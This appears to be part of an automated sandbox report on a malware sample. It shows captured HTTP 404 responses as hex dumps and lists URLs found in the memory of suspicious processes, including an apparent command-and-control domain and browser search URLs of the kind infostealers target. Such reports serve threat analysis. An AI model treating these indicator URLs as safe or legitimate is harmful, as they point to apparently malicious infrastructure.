Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 01:24:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 01:24:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 01:24:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 05 Jul 2024 01:25:18 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 05 Jul 2024 01:25:18 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 05 Jul 2024 01:25:18 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 05 Jul 2024 01:25:20 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 05 Jul 2024 01:25:23 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 05 Jul 2024 01:25:25 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4090192746.00000000050BB000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.hsck520.com
Source: KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4090192746.00000000050BB000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.hsck520.com/2e2r/
Source: RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: firefox.exe, 00000008.00000002.2051321397.0000000012694000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://cdn.livechatinc.com/tracking.js
Source: RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
Source: RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
Source: RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
